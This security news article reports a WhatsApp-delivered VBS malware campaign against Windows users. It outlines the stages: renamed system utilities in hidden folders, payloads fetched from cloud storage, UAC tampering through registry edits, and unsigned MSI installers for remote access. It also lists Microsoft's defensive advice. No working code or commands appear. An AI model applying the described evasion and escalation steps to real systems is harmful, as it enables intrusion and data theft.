A sophisticated new malware campaign is actively leveraging WhatsApp to distribute malicious files directly to Windows users, exploiting the platform’s widespread trust and familiarity. Threat actors are sending Visual Basic Script (VBS) files through WhatsApp messages, preying on the likelihood that recipients will open attachments from seemingly safe sources. Once executed, these files initiate a silent infection process in the background, operating without any visible alerts to the unsuspecting user.
This campaign is notable for its stealthy approach, employing “living-off-the-land” techniques that utilize legitimate Windows tools. Threat actors are renaming standard utilities like curl.exe and bitsadmin.exe to mimic system files and embedding them within hidden folders in C:ProgramData. Subsequent malicious payloads are then downloaded from trusted cloud services such as AWS S3, Tencent Cloud, and Backblaze B2, making the illicit downloads appear as routine system activity, according to findings by the Microsoft Defender Security Research Team in late February 2026.
Exploiting WhatsApp for Malware Delivery: A Stealthy Attack Chain
The discovered malware operation combines social engineering with advanced infection techniques designed for maximum stealth. It operates through multiple stages to deploy malicious MSI packages, establish persistence, and ultimately open remote access channels for attackers. These MSI packages, including Setup.msi, WinRAR.msi, LinkPoint.msi, and AnyDesk.msi, are delivered without valid code-signing certificates, a significant deviation from what is typically seen with legitimate enterprise software.
The attack chain commences when a user inadvertently executes a malicious VBS file received via WhatsApp. The script then creates hidden directories within C:ProgramData and places renamed versions of Windows utilities, such as curl.exe disguised as netapi.dll and bitsadmin.exe as sc.exe. Crucially, even with these name changes, the files retain their original PE metadata, including the OriginalFileName field. This discrepancy between the displayed filename and the embedded metadata can serve as a detection vector for security tools.
These disguised tools are then used to download secondary VBS payloads from cloud-hosted infrastructure belonging to the attackers. Files named auxs.vbs and WinUpdate_KB5034231.vbs are hosted on widely recognized platforms like AWS S3 and Backblaze B2. This strategy is effective because corporate firewalls are less likely to block traffic to these services, and the file names are deliberately chosen to resemble legitimate Windows update packages, further minimizing suspicion.
Bypassing User Account Control and Establishing Persistence
Upon execution of the secondary scripts, the malware begins actively attempting to elevate its privileges by tampering with User Account Control (UAC) settings. It repeatedly attempts to run cmd.exe with administrative rights, modifying registry entries under HKLMSoftwareMicrosoftWin until elevated permissions are secured. Once administrative rights are obtained, the malware suppresses security prompts, ensuring that the final MSI installers are executed without triggering any alerts that might inform the user or an IT administrator of the ongoing compromise.
The ultimate goal of this malware campaign is to establish persistent remote access to the compromised systems. This allows attackers the ability to exfiltrate sensitive data, deploy further malicious software, or utilize the compromised machine as a pivot point for broader attack operations. The unsigned nature of the final MSI installers is a critical indicator of their malicious intent, as trusted software typically carries a valid digital signature from a reputable publisher.
Defense Strategies Against this Advanced WhatsApp Cyber Threat
Microsoft recommends several key defense strategies to mitigate the risk posed by this evolving WhatsApp attack chain. Organizations should consider blocking script hosts, such as wscript and cscript, from executing in untrusted locations and monitor for renamed Windows utilities that are launched with unusual command-line flags. Furthermore, security teams should inspect and filter outbound traffic to cloud platforms like AWS S3, Tencent Cloud, and Backblaze B2, as these are frequently used by attackers for payload delivery.
Real-time monitoring of registry changes under HKLMSoftwareMicrosoftWin is also advised, and any repeated attempts to tamper with UAC should be flagged as potential indicators of compromise. Enabling Endpoint Detection and Response (EDR) in block mode is crucial, as it can neutralize malicious artifacts even if conventional antivirus solutions fail to detect them. Activating tamper protection can prevent attackers from disabling critical security services post-compromise.
Implementing attack surface reduction rules to block VBScript from initiating the execution of downloaded executables adds another vital layer of defense. However, one of the most effective initial defenses remains user education. Training end-users to critically evaluate and question unexpected attachments received via WhatsApp, even when sent from known contacts, is paramount in preventing this sophisticated attack from initiating in the first place.
Organizations should remain vigilant for further evolution of this attack, as threat actors continuously adapt their methods. The upcoming focus will likely be on how effectively detection and prevention mechanisms are updated to counter these sophisticated stealth techniques leveraging everyday communication platforms.